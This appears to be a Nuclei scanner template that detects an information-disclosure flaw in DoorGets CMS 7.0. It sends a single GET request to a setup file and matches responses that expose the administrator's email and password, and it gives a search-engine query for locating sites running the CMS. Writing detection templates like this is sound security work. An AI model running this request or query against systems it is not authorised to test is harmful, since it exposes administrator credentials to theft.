id: doorgets-info-disclosure info: name: DoorGets CMS v7.0 - Information Disclosure author: r3Y3r53 severity: high description: | doorGets 7.0 has a sensitive information disclosure vulnerability in /setup/temp/admin.php. A remote unauthenticated attacker could exploit this vulnerability to obtain administrator's password. reference: - https://packetstormsecurity.com/files/174236/DoorGets-CMS-7.0-Information-Disclosure.html - https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory metadata: verified: true max-request: 1 google-query: "Powered with doorGets ™" product: doorgets vendor: doorgets tags: doorgets,cms,packetstorm,disclosure classification: cpe: cpe:2.3:a:doorgets:doorgets:*:*:*:*:*:*:*:* http: - method: GET path: - "{{BaseURL}}/v12/setup/temp/admin.php" matchers-condition: and matchers: - type: word part: body words: - ':"email";' - ':"password";' condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 4a0a0047304502206788d55acc068a11913282587ec6d6f26f3f651173d8d4e24337be109279d687022100bc7d7cefbb3e21f172d7f7d8a525a8bb1231c61532ad0d7d849ae542d0692f46:922c64590222798bb761d5b6d8e72950